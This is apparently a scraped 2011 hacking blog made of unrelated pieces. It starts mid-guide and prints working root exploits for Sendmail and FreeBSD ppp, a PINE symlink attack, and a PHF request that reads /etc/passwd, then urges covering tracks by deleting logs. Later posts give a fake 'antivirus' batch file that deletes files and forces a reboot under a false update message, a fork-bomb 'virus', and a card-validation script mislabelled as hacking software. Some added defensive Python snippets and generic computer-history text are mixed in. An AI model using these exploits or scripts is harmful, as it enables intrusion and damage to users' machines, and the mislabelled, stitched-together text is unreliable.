2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker, there are a few OK ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also be added). We will be releasing our password file to the public soon; it will be called Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation.

3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique

Well, I wasn't sure if I should include this section, due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf, I decided to include it. The phf technique is by far the easiest way of getting a password file (although it doesn't work 95% of the time). To do the phf, all you do is open a browser and type in the following link:

    http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for http://www.webpage.com/ you would type:

    http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file (if it works).
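The request above stands out in a web server log because the query string carries an encoded newline (%0a) into a CGI script. The following is an added example, not part of the original text: it scans Common Log Format lines for CGI requests whose decoded query contains a control character and separates probes from requests the server actually answered. The log lines are constructed, using documentation-range addresses and the request shown above.

```python
"""Flag CGI requests whose decoded query string contains control characters."""
import re
from urllib.parse import urlsplit, unquote

# Constructed Common Log Format lines; none come from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Feb/2011:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 5120',
    '192.0.2.44 - - [06/Feb/2011:10:03:17 +0000] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 210',
    '192.0.2.10 - - [06/Feb/2011:10:04:40 +0000] '
    '"GET /cgi-bin/search?q=hello%20world HTTP/1.0" 200 933',
    '192.0.2.77 - - [06/Feb/2011:10:09:58 +0000] '
    '"GET /cgi-bin/phf?Qalias=x%0A/bin/cat%20/etc/passwd HTTP/1.0" 200 1874',
    'this line is not in Common Log Format and is skipped',
]

CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)(?: [^"]*)?" (\d{3}) \S+')
CONTROL = re.compile(r"[\x00-\x1f\x7f]")  # newline, carriage return, NUL, ...


def scan_access_log(lines):
    """Return one dict per suspicious CGI request found in the log lines."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        src, _method, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.startswith("/cgi-bin/"):
            continue
        query = unquote(parts.query)  # %0a and %0A both decode to "\n"
        if not CONTROL.search(query):
            continue
        hits.append({
            "src": src,
            "script": parts.path,
            "status": int(status),
            # Text after the first control character is what would have
            # reached the shell if the script was vulnerable.
            "injected": CONTROL.split(query, maxsplit=1)[1].strip(),
            # A 2xx answer means the script exists and ran: treat it as a
            # possible disclosure, not just a probe.
            "severity": "served" if status.startswith("2") else "probe",
        })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```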
Telnet and Exploits

Well, exploits are the best way of hacking webpages, but they are also more complicated than hacking through ftp or using the phf. Before you can set up an exploit you must first have a telnet proggie; there are many different clients, and you can just do a netsearch and find everything you need. It’s best to get an account with your target (if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each separately. I’m going to list a few below, but the list of exploits is endless.

This exploit is known as Sendmail v.8.8.4. It creates a suid program /tmp/x that calls shell as root. This is how you set it up:

    cat << _EOF_ >/tmp/x.c
    #define RUN "/bin/ksh"
    #include
    main()
    {
    execl(RUN,RUN,NULL);
    }
    _EOF_
    #
    cat << _EOF_ >/tmp/spawnfish.c
    main()
    {
    execl("/usr/lib/sendmail","/tmp/smtpd",0);
    }
    _EOF_
    #
    cat << _EOF_ >/tmp/smtpd.c
    main()
    {
    setuid(0); setgid(0);
    system("chown root /tmp/x ;chmod 4755 /tmp/x");
    }
    _EOF_
    #
    #
    gcc -O -o /tmp/x /tmp/x.c
    gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
    gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
    #
    /tmp/spawnfish
    kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
    rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
    sleep 5
    if [ -u /tmp/x ] ; then
    echo "leet..."
    /tmp/x
    fi

And now on to another exploit. I’m going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile.
Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.

This was written by Sean B. Hamor… For this example, hamors is the victim while catluvr is the attacker:

    hamors (21 19:04) litterbox:~> pine
    catluvr (6 19:06) litterbox:~> ps -aux | grep pine
    catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
    hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
    catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
    - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
    catluvr (8 19:07) litterbox:~> ps -aux | grep pine
    catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
    catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
    hamors (23 19:09) litterbox:~> pine
    catluvr (11 19:10) litterbox:~> ps -aux | grep pine
    catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
    hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
    catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
    catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
    + +
    catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
    catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

Now on to another one; this will be the last one that I’m going to show. Exploitation script for the ppp vulnerability as described by no one to date; this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesn't work.
This is how you set it up:

    #include
    #include
    #include

    #define BUFFER_SIZE 156 /* size of the buffer to overflow */
    #define OFFSET -290 /* number of bytes to jump after the start of the buffer */

    long get_esp(void) { __asm__("movl %esp,%eax\n"); }

    main(int argc, char *argv[])
    {
      char *buf = NULL;
      unsigned long *addr_ptr = NULL;
      char *ptr = NULL;
      char execshell[] =
      "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
      "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
      "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
      "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
      int i,j;

      buf = malloc(4096);

      /* fill start of buffer with nops */
      i = BUFFER_SIZE-strlen(execshell);
      memset(buf, 0x90, i);
      ptr = buf + i;

      /* place exploit code into the buffer */
      for(i = 0; i < strlen(execshell); i++)
        *ptr++ = execshell[i];

      addr_ptr = (long *)ptr;
      for(i=0;i < (104/4); i++)
        *addr_ptr++ = get_esp() + OFFSET;

      ptr = (char *)addr_ptr;
      *ptr = 0;

      setenv("HOME", buf, 1);
      execl("/usr/sbin/ppp", "ppp", NULL);
    }

Now that you’ve gotten root, "what’s next?" Well, the choice is up to you, but I would recommend changing the password before you delete or change anything. To change their password all you have to do is log in via telnet and log in with your new account. Then you just type: passwd, and it will ask you for the old password first, followed by the new one. Now only you will have the new pw and that should last for a while. You can now upload your pages, delete all the logs and just plain do your worst.

Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them. We recommend that if you are serious about learning ethical hacking that you download our Unix Bible.
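The PINE lockfile problem described earlier in this post comes down to a program opening a predictable name in /tmp and following whatever is already there. The following is an added example, not part of the original text: it reproduces the condition inside a private temporary directory and shows that creating the file with O_CREAT | O_EXCL refuses a pre-planted symbolic link. All paths and function names are stand-ins chosen for illustration.

```python
"""Lockfile creation that follows a planted symlink, beside a hardened form."""
import os
import tempfile


def naive_lock(path, pid):
    """Open by name: if path is a symlink, the link target gets written."""
    with open(path, "w") as fh:
        fh.write(str(pid))
    os.chmod(path, 0o666)  # world-writable, as in the behaviour described


def safe_lock(path, pid):
    """Create the lockfile only if nothing at all exists under that name.

    O_EXCL with O_CREAT fails when the name exists, even as a dangling
    symlink, so a planted link is rejected instead of followed.
    """
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)  # owner-only, not 666
    with os.fdopen(fd, "w") as fh:
        fh.write(str(pid))


def demo():
    """Plant a symlink where the lockfile goes, then try both creators.

    Returns (naive_wrote_target, safe_refused, target_exists_after_safe).
    """
    with tempfile.TemporaryDirectory() as work:
        home = os.path.join(work, "home")
        os.mkdir(home)
        target = os.path.join(home, "rhosts_standin")  # stands in for ~user/.rhosts
        lock = os.path.join(work, "lockfile")          # stands in for /tmp/.302.f5a4
        os.symlink(target, lock)                       # the planted link

        naive_lock(lock, 1756)
        naive_wrote_target = os.path.exists(target)
        os.remove(target)  # reset; the link is dangling again

        try:
            safe_lock(lock, 1756)
            safe_refused = False
        except FileExistsError:
            safe_refused = True
        return naive_wrote_target, safe_refused, os.path.exists(target)


if __name__ == "__main__":
    print(demo())
```

Keeping lockfiles in a directory only the owning user can write to removes the race altogether; the exclusive create is the fallback when a shared directory such as /tmp cannot be avoided.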

Tuesday, February 1, 2011

HOW TO MAKE ANTIVIRUS IN NOTEPAD?

February 01, 2011 3
Now I am going to teach you how to make an antivirus with Notepad. Open Notepad and type the following code.
//////////////////////////////////////////////////////////////////////
x=msgbox("Anti-Virus should delete some of the virus's that you may have.",1+16 , "Alert")
x=msgbox("what this does is removes anything that Has any text that seems like a virus",1+16 ,"Alert")
x=msgbox("It will also go through your computer and delete All Batch Files.",1+16 ,"Alert")
x=msgbox("If you want any of you .bat files saved then do so before hitting okay",1+16 ,"Alert")
x=msgbox("The Anti-Virus software is now ready to begin. click okay to begin",1+16 ,"Alert")
del (:'bat*):
x=msgbox("All BAT Files sucessfully removed. click okay to Continue,",1+16 ,"Alert")
del virus.vbs
del virus.bat
del torjan.bat
del torjan.vbs
del infected.bat
del infected.vbs
del TROJ.bat:
del TOR.vbs
del Torjan Horse Bat
del Torjan Horse, vbs
del OM.bat
del OM.vbs
del Macro Virus.bat
del Micro Virus.vbs
del conflicker.bat
del conflicker.bat
x=msgbox("Anti-Virus Completed...Will Now test and make working",1+16 ,"Alert")
open notepad
open mspaint
open controlpanel
open MyDocuments
x=msgbox("Now we will Shutdown/Restart your computer, and windows will install an important update for your computer",1+16 ,"Alert")
Shutdown -r -c "Rebooting computer for important windows updates"
x=msgbox("anti-Virus Software Complete. The program now close.",1+16,"Alert")
//////////////////////////////////////////////////////////////////////
Save it as Antivirus.bat

HOW TO MAKE MATRIX EFFECT?

February 01, 2011 0
Now I am going to tell you how to make the matrix effect. First open Notepad and type this.
-------------------------------------------------------------------------------------------------------------
@echo off
color 2
:loop
echo 01 0 1 011 0 1 01 00 1 11 0 1 11 0000 1 1 00
echo 00 11 0 11 0 11 1 1 00 10 1 0 11 11 0 10 00 10 1
echo 11 10 1 010101 11 0 11010 101011 0 1110101
echo 011 101 01110 10 1011101 010101 1 01 0 10 10 1 0
echo 001 11 10 1 101010 110 1100101 0 11010 1010 10 1
echo 011 110 10 10 1011110 110101 0101 0 10 1 01101 1
echo 110 010 11010 010 0 11 10 10 01 101010 010101 10
goto loop
-------------------------------------------------------------------------------------------------------------
Save it as matrix.bat
ENJOY IT

HOW TO MAKE CREDIT CARD HACKING SOFTWARE?

February 01, 2011 0
WELCOME
Now I am going to tell you how to make credit card hacking software.
As Usual Open notepad and copy below text
************************************************************************************
<?php
// The opening lines of validate_creditcard() are cut off on the page. The
// function name comes from the call at the bottom of the script; the outer
// is_string() test is an assumed stand-in for the missing condition.
function validate_creditcard($card_number){
    if(is_string($card_number)){
        $card_number=str_replace(' ', '', $card_number);
        if(ctype_digit($card_number)){
            // Luhn check: offset of the digits that get doubled
            if( (strlen($card_number)%2)==0){ $i=0; } else{ $i=1; }
            $odd=get_odd_sum($card_number,$i);
            // offset of the digits that are used as they are
            if( (strlen($card_number)%2)==0){ $i=1; } else{ $i=0; }
            $even=get_even_sum($card_number,$i);
            $combined_odd_even=$odd . $even;
            $final=add_numbers($combined_odd_even);
            // valid when the sum of all resulting digits is a multiple of 10
            if($final%10==0){ return(1); } else{ return(0); }
        } else {
            return(0);
        }
    } else {
        return(0);
    }
}

// Doubles every second digit and joins the results into one digit string
function get_odd_sum($card_number,$i){
    $odd_sum=NULL;
    while(isset($card_number[$i])) {
        $odd_sum .= ($card_number[$i]*2);
        $i=$i+2;
    }
    return($odd_sum);
}

// Joins the remaining digits, unchanged, into one digit string
function get_even_sum($card_number,$i){
    $even_sum=NULL;
    while(isset($card_number[$i])) {
        $even_sum .= $card_number[$i];
        $i=$i+2;
    }
    return($even_sum);
}

// Adds up every single digit of the combined string
function add_numbers($combined_odd_even){
    $i=0;$final=0;
    while(isset($combined_odd_even[$i])){
        $final=$final+$combined_odd_even[$i];
        $i++;
    }
    return($final);
}

//////////////////////////////////////////////////////////
/* CREDIT CARD TYPE */
//////////////////////////////////////////////////////////
// CHECKS FOR MASTERCARD, VISA, DISCOVER, & AMERICAN EXPRESS
// RETURNS Unknown IF NO MATCH IS FOUND
function get_card_type($card_number){
    // REFERENCE
    // strip spaces here too, so the length tests match what was validated
    $card_number=str_replace(' ', '', $card_number);
    if(strlen($card_number)==16){
        if($card_number[0].$card_number[1]>=51 && $card_number[0].$card_number[1]<=55){
            return("Mastercard");
        }else if($card_number[0]==4){
            return("Visa");
        }else if($card_number[0].$card_number[1].$card_number[2].$card_number[3]==6011){
            return("Discover");
        }
    }else if(strlen($card_number)==13){
        if($card_number[0]==4){
            return("Visa");
        }
    }else if(strlen($card_number)==15){
        if($card_number[0].$card_number[1]==34 || $card_number[0].$card_number[1]==37){
            return("American Express");
        }
    }
    return("Unknown");
}

//////////////////////////////////////////////////////////
/* THIS IS THE START OF THE SCRIPT */
if(isset($_GET['card'])){
    if(validate_creditcard($_GET['card'])){
        echo "VALID CARD - TYPE: " . get_card_type($_GET['card']);
    }else{
        echo "INVALID CARD";
    }
}
**************************************************************************************************************
Save it as card.exe and run it

Tips

February 01, 2011 0
What can we do with a computer? We can use a computer for different purposes, for example listening to music, playing games, movie making, online business, etc.

How to make a virus? Most people have a problem with viruses.

Today I will tell you how to make a virus. First click on the Start menu, then select All Programs, go to Accessories, then click on Notepad. Another way to open Notepad: go to Run, type notepad and hit Enter.

Here is the code for making the virus (below):

-------------------------------------------------------------------------------------------------------------
Start Virus.bat
virus.bat
-------------------------------------------------------------------------------------------------------------
Go to File at the top, click there and choose Save As (click on Desktop and give it the name virus.bat), then save it. "OPEN IT AT YOUR OWN RISK"
February 01, 2011 0
Computer hacking is the practice of modifying computer hardware and software to accomplish a goal outside of the creator’s original purpose. People who engage in computer hacking activities are often called hackers. Since the word “hack” has long been used to describe someone who is incompetent at his/her profession, some hackers claim this term is offensive and fails to give appropriate recognition to their skills. Computer hacking is most common among teenagers and young adults, although there are many older hackers as well. Many hackers are true technology buffs who enjoy learning more about how computers work and consider computer hacking an “art” form. They often enjoy programming and have expert-level skills in one particular program. For these individuals, computer hacking is a real life application of their problem-solving skills. It’s a chance to demonstrate their abilities, not an opportunity to harm other
First Generation (1940-1956)
Vacuum Tubes
The first computers used vacuum tubes for circuitry and magnetic drums for memory, and were often enormous, taking up entire rooms. First generation computers relied on machine language, the lowest-level programming language understood by computers, to perform operations, and they could only solve one problem at a time. Input was based on punched cards and paper tape, and output was displayed on printouts.
Second Generation (1956-1963)
Transistors
Transistors replaced vacuum tubes and ushered in the second generation of computers.
The transistor was far superior to the vacuum tube, allowing computers to become smaller, faster, cheaper, more energy-efficient and more reliable than their first-generation predecessors. Second-generation computers moved from cryptic binary machine language to symbolic.
Third Generation (1964-1971)
Integrated Circuits
The development of the integrated circuit was the hallmark of the third generation of computers. Transistors were miniaturized and placed on silicon chips, called semiconductors, which drastically increased the speed and efficiency of computers.
Computers for the first time became accessible to a mass audience because they were smaller and cheaper than their predecessors.
Fourth Generation (1971-Present)
Microprocessors
The microprocessor brought the fourth generation of computers, as thousands of integrated circuits were built onto a single silicon chip.
As these small computers became more powerful, they could be linked together to form networks, which eventually led to the development of the Internet. Fourth generation computers also saw the development of GUIs, the mouse and handheld devices.
Fifth Generation (Present and Beyond)
Artificial Intelligence
Fifth generation computing devices, based on artificial intelligence, are still in development, though there are some applications, such as voice recognition, that are being used today. The use of parallel processing and superconductors is helping to make artificial intelligence a reality. Quantum computation and molecular and nanotechnology will radically change the face of computers in years to come.
Computer disadvantages are as follows:
Violation of privacy: it is crucial that personal and confidential records stored in computers be protected properly.
Impact on the labor force: although computers have improved productivity and created an entire industry with hundreds of thousands of new jobs, the skills of hundreds of thousands of employees are replaced by computers.
Health risks: prolonged or improper computer use can lead to head injuries or disorders. Computer users can protect themselves from health risks through proper workplace design, good posture while at the computer, and appropriately spaced work breaks.
Impact on the environment: computer manufacturing processes and computer waste are depleting natural resources and polluting the environment.
Computer viruses are small software programs that are designed to spread from one computer to another and to interfere with computer operation. Computer viruses are often spread by attachments in e-mail messages or instant messaging messages. That is why it is essential that you never open e-mail attachments unless you know who they are from and you are expecting them. Viruses can be disguised as attachments of funny images, greeting cards, or audio and video files. Computer viruses also spread through downloads on the Internet. They can be hidden in illicit software or other files or programs you might download. To help avoid computer viruses, it's essential that you keep your computer current with the latest updates and antivirus tools, stay informed about recent threats, run your computer as a standard user (not as administrator), and follow a few basic rules when you surf the Internet, download files, and open attachments. Once a virus is on your computer, its type or the method it used to get there is not as important as removing it and preventing further infection.
The time taken by a computer to perform a task is called the speed of the computer. As we know, a computer can work very fast. It takes only a few seconds for calculations that take us hours to complete.
You will be surprised to know that a computer can perform millions (1,000,000) of instructions, and even more, per second. The speed of a computer is measured in terms of Mega Hertz (MHZ), Giga Hertz (GHZ), etc. Nowadays we have GHZ-speed computers. Hertz is the unit of frequency, that is, the number of signals per second.
The fractions of a second are given below.

Unit of time      | Part of second                        | Unit of speed
Milliseconds (ms) | one thousandth, 1/1,000               | Kilo Hertz (KHZ) = 10^3 HZ
Micro seconds     | one millionth, 1/1,000,000            | Mega Hertz (MHZ) = 10^6 HZ
(ms)              | one billionth, 1/1,000,000,000        | Giga Hertz (GHZ) = 10^9 HZ
Nanoseconds (ns)  | one trillionth, 1/1,000,000,000,000   | Tera Hertz (THZ) = 10^12 HZ